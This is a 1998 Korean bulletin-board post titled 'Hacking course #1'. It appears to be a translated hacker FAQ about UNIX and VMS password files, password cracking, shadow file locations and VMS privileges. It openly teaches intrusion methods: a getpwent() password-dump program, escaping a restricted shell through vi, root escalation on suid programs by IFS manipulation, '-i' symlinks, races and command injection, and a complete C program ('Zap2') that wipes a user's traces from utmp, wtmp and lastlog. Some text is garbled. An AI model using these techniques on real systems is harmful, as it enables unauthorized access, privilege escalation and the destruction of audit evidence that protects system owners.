swindler's board

리눅스 기타 자료

제목	해킹 강좌 #1 1998/06/30 (14:18)
이름	김효원
번호	32
조회	230
본문	-------------------------------------------------------------------------------- UNIX에서 어떻게 패스워드 파일에 접근할 수 있나? 표준 UNIX에서 패스워드 파일은 /etc/passwd이다. UNIX 중에서 NIS/yp 또는 패스워드 새도우기능을 갖춘 경우에 패스워드 정보는 다른 곳에 있다. 패스워드 파일의 엔트리는 7개의 콜론으로 구분된 필드가 있다. 구분해서 보면, 이 패스워드 파일의 줄은 다음과 같다. Username(사용자 이름) 암호화된 패스워드 (선택적인 패스워드 수명 데이터) 사용자 번호 그룹 번호 GECOS 정보 홈 디렉토리 쉘 ] ] /etc/passwd의 엔트리의 일례: ] ] will:5fg63fhD3d5gh:9406:12:Will Spencer:/home/fsg/will:/bin/bash ] UNIX 패스워드를 어떻게 깨나? 일반적인 믿음과는 상반되겠지만, UNIX의 패스워드 파일은 해독할 수 없다. UNIX 패스워드는 단반향 함수(one way function)으로 암호화되어 있다. 로그인 프로그램은 "password:"라고 표시되는 프롬프트에서 입력되는 패스워드를 암호화하여 패스워드 파일에 암호화된 패스워드와 비교한다. 패스워드를 깨는 프로그램(password cracking program)은 단어장(wordlist)를 이용한다. 단어장에 있는 단어 하나씩을 암호화하여 패스워드 파일에 있는 암호와 비교한다. 지금까지 나와 있는 가장 좋은 패스워드 깨는 프로그램은 Alec Muffett이 작성한 Crack이다. DOS용 프로그램으로는 CrackJack이 가장 좋다. CrackJack은 ftp를 이용하여 clark.net의 /ub/jcase/ 디렉토리에서 구할 수 있다. 패스워드 새도우란 무엇인가? 패스워드 새도우란 보안 시스템으로서 암호화된 /etc/passwd의 패스워드 필드가 특별한 문자로 치환되어 있으며, 실제의 패스워드는 정상적인 사용자가 읽을 수 없는 파일에 저장되어 있다. 대부분(전부는 아니고)의 시스템에서 패스워드 새도우를 깨기 위해서 getpwent()함수를 연속적으로 부르는 프로그램을 작성하여 패스워드 파일을 만들 수 있다. 예: #include <pwd.h> main() { struct passwd p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } 새도우화 되어 있는 패스워드 파일은 어디서 찾나? Unix Path(경로) Token ----------------------------------------------------------------- AIX 3 /etc/security/passwd ! or /tcb/auth/files/<first letter # of username>/<username> A/UX 3.0s /tcb/files/auth/?/ BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir\|.pag] * SCO Unix #.2.x /tcb/auth/files/<first letter * of username>/<username> SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow <optional NIS+ private secure maps/tables/whatever> System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir\|.pag] * UNICOS /etc/udb * NIS/yp란 무엇인가? NIS(Network Information System)은 현재의 이름이고 예전에는 yp(Yellow Page)라고 불리웠다. NIS의 목적은 네트워크에서 여러 기계들이 패스워드와 같은 구성정보를 공유하기 위함이다. NIS는 시스템 보안을 위해서 설계되어 있지 않다. NIS를 이용하고 있다면 /etc/passwd 파일에 다음과 같은 것이 들어 있다. +::0:0::: 실제 패스워드 파일을 보기 위해서 "ypcat passwd" 명령을 이용하면 된다. 패스워드 파일에서 쉽표뒤에 나오는 이상한 문자들은 무엇인가? 문자는 패스워드 수명(age)을 나타내는 것이다. 패스워드 수명은 관리자가 정한 기일 내에 패스워드 파일을 바꾸도록 한다. 패스워드 수명은 사용자가 패스워드를 바꾸기 전에 정해진 시간만큼은 사용하도록 하기도 한다. ] ] 패스워드 수명 기능이 들어 있는 /etc/passwd 파일의 일례 ] ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash ] 암호화된 패스워드 필드 뒤의 쉼표에 주의하자. 쉼표뒤에 나오는 문자는 모두 패스워드 수령기법을 위해서 사용된다. ] ] 위 예에서의 패스워드 수명 문자 ] ] M.z8 ] 4 개의 문자가 다음과 같이 번역된다. 1: 패스워드를 변경하지 않고 사용할 수 있는 최대 주(week)의 수 2: 패스워드를 변경하기 전까지 사용해야 할 최소 주(week)의 수 3&4: 1970년 이후로 주의 수로 마지막 패스워드가 바뀐 때 3가지 특별한 경우가 있다. 첫 번째와 두 번째 문자가 '..'로 설정되어 있을 때, 사용자는 다음에 로그인할 때 패스워드를 바꿔야만 한다. 그리고나서 패스워드 프로그램은 패스워드 수명 문자를 없애고, 사용자는 다시 새로운 패스워드 수명에 적용을 받게 된다. 세 번째와 네 번째 문자가 '..'로 설정되어 있을 때, 사용자는 다음에 로그인할 때 패스워드를 바꿔야 한다. 패스워드 프로그램은 첫 번째 두 번째의 경우와 같은 행동을 한다. 만일 첫 번째 문자(MAX)가 두 번째 문자(MIN) 보다 작을 경우, 사용자는 패스워드를 바굴 수 있는 허가가 박탈된다. root만이 이 사용자의 패스워드를 변경할 수 있다. su 명령은 패스워드 수명 데이터를 검사하지 않는다는데 유의하기 바란다. 말소된 패스워드를 가진 계정으로 su를 행할 수 있다. 패스워드 수명 코드(Password Aging Codes) +------------------------------------------------------------------------+ \| \| \| Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H \| \| Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 \| \| \| \| Character: I J K L M N O P Q R S T U V W X Y Z a b \| \| Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 \| \| \| \| Character: c d e f g h i j k l m n o p q r s t u v \| \| Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 \| \| \| \| Character: w x y z \| \| Number: 60 61 62 63 \| \| \| +------------------------------------------------------------------------+ VMS의 패스워드 파일에 어떻게 접근하나? VMS에서 패스워드 파일은 SYS$SYSTEM:SYSUAF.DAT이다. 그러나, UNIX와는 다르게 대부분의 사용자는 패스워드 파일을 읽을 수 있는 권한이 없다. VMS 에서는 어떻게 패스워드를 깨나? SYS$GETUAF 함수를 이용하여 SYSUAF.DAT에 있는 암호화된 패스워드와 결과를 비교하는 프로그램을 작성한다. 두 가지 프로그램이 있는데, CHECK_PASSWORD 와 GUESS_PASSWORD이다. 로그로 남기나? VMS의 거의 모든 것을 로그로 남길 수 있다. SHOW ACCOUNTING 명령을 이용하여 시스템의 로그 상태를 조사할 수 있다. 시스템 감사가 보안의 목적으로 로그 정보를 남기는 것에 반해, 계끑¤ 이용상태에 대한 정보를 남기는 것이 시스템 어카운팅이다(CPU 이용시간, 트린터 사용 등). 어카운팅을 하기위해서는 다음과 같은 절차를 따른다. $ SET ACCOUNTING [/ENABLE=(Activity...)] 이렇게 하면, SYS$MANAGER:ACCOUNTING>DAT 파일에 감시 로그정보를 남긴다. 이것은 또한 이전 로그 파일을 닫고 새로운 버전의 로그를 남긴다. 다음과 같은 것이 로그로 남을 수 있다. BATCH Termination of a batch job DETACHED Termination of a detached job IMAGE Image execution INTERACTIVE Interactive job termination LOGIN_FAILURE Login failures MESSAGE Users messages NETWORK Network job termination PRINT Print Jobs PROCESS Any terminated process SUBPROCESS Termination of a subprocess 보안 감사를 이용하기 위해서는 $ SET AUDIT /ALARM 은 보안 운영자로 지정된 터미널에 경고를 울리기 위해서 사용하는 옵션이다. 다시 말해서 SECURITY 권한이 필요함을 일깨우는 데 사용된다. 보안 감사 구성을 $ SHOW AUDIT /ALL명령을 통해서 알수 있다. 보안 감사는 다음과 같은 행위를 로그로 남기도록 할 수 있다. ACL Access Control List requested events AUTHORIZATION Modification to the system user authorization file SYS$SYSTEM:SYSUAF.DAT BREAKIN Attempted Break-ins FILE_ACCESS File or global section access INSTALL Occurrence of any INSTALL operations LOGFAILURE Any login failures LOGIN A login attempt from various sources LOGOUT Logouts MOUNT Mount or dismount requests VMS에서의 권한은 어떤 것이 있나? ACNT Allows you to restrain accounting messages ALLSPOOL Allows you to allocate spooled devices ALTPRI Allot Priority. This allows you to set any priority value BUGCHK Allows you make bug check error log entries BYPASS Enables you to disregard protections CMEXEC/ CMKRNL Change to executive or kernel mode. These privileges allow a process to execute optional routines with KERNEL and EXECUTIVE access modes. CMKRNL is the most powerful privilege on VMS as anything protected can be accessed if you have this privilege. You must have these privileges to gain access to the kernel data structures directly. DETACH This privilege allow you to create detached processes of arbitrary UICs DIAGNOSE With this privilege you can diagnose devices EXQUOTA Allows you to exceed your disk quota GROUP This privilege grants you permission to affect other processes in the same rank GRPNAM Allows you to insert group logical names into the group logical names table. GRPPRV Enables you to access system group objects through system protection field LOG_IO Allows you to issue logical input output requests MOUNT May execute the mount function NETMBX Allows you to create network connections OPER Allows you to perform operator functions PFNMAP Allows you to map to specific physical pages PHY_IO Allows you to perform physical input output requests PRMCEB Can create permanent common event clusters PRMGBL Allows you to create permanent global sections PRMMBX Allows you to create permanent mailboxes PSWAPM Allows you to change a processes swap mode READALL Allows you read access to everything SECURITY Enables you to perform security related functions SETPRV Enable all privileges SHARE Allows you to access devices allocated to other users. This is used to assign system mailboxes. SHMEM Enables you to modify objects in shared memory SYSGBL Allows you to create system wide permanent global sections SYSLCK Allows you to lock system wide resources SYSNAM Allows you to insert in system logical names in the names table. SYSPRV If a process holds this privilege then it is the same as a process holding the system user identification code. TMPMBX Allows you create temporary mailboxes VOLPRO Enables you to override volume protection WORLD When this is set you can affect other processes in the world 프로세스가 어떤 권한으로 수행하고 있는지 알기 위해서 다음과 같은 명령을 사용한다. $ show /proc/priv 제한된 쉘에서 어떻게 빠져 나오나? 잘못 작성한 제한 쉘에서는 쉘에서 사용하는 기능을 가진 프로그램을 수행함으로서 빠져나올 수 있다. 좋은 예가 vi이다. vi를 수행할 때 다음과 같은 명령을 이용하라. :set shell=/bikn/sh 그리고 나서 다으모가 같은 명령을 이용하여 쉘을 얻는다. : shell 제한 쉘에서 "cd" 명령을 사용할 수 없도록 한다면 그 계정으로 ftp를 하면 cd를 할 수 있다. suid 스크립트나 프로그램에서 어떻게 root의 권한을 얻을 수 있나? 1. 프로그램에서 system()을 이용하여 다른 프로그램을 부른다.면, IFS를 변경하여 그 프로그램을 우롱할 수 있다. IFS는 내부 필드 구분자(Internal Field Separator)의 약자로서 쉘에서 인수를 구분하는 문자로서 사용하는 것이다. 프로그램에 다음과 같은 것이 포함된다고 하자. system("bin/data") 그리고 IFS를 '/'로 변경하면 쉘은 명령을 다음과 같이 번역한다. bin date 이제, 프로그램 중에 bin이라는 것이 경로(path)중에 있다면, suid 프로그램은 /bin/date 프로그램 대신 bin이라는 프로그램을 수행하게 된다. IFS를 바꾸기 위해서, 다음과 같은 명령을 이용한다. IFS='/'; export IFS setenv IFS '/' export IFS='/' 2. 스크립트를 -i로 연결(link)한다. "-i"라는 프로그램을 만들어 심볼릭 링크(symbolic link)를 만든다. "-i"를 수행하면 쉘(/bin/sh)이 상호작용(interactive) 모드가 되게 한다. 이 방법은 suid(set uid)되어 있는 스크립트에서만 사용가능하다. 예: % ln suid.sh -i % -i # 3. 경쟁 조건을 이용한다. 커널에서 /bin/sh를 로드할 때 다른 프로그램으로 프로그램에 대한 심볼릭 링크를 바꾼다. 예: nice -19 suidprog; ln -s evilprog suidroot 4. 프로그램에 잘못된 입력을 보낸다. 프로그램과 다른 명령을 한 커맨드 라인에서 수행한다. 예: suidprog; id 시스템 로그에서 내 존재를 없애는 방법은? /etc/utmp, /usr/adm/wtmp와 /usr/adm/lastlog 파일을 변경한다. 이것들은 텍스트 파일이 아니라 서 vi로 편집할 수 없다. 특별한 목적을 지닌 프로그램을 작성해야 한다. 예: #include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <sys/file.h> #include <fcntl.h> #include <utmp.h> #include <pwd.h> #include <lastlog.h> #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char )&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char )&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char who; { struct passwd pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char )&newll,sizeof( newll )); write(f, (char )&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); }

1998 by swindler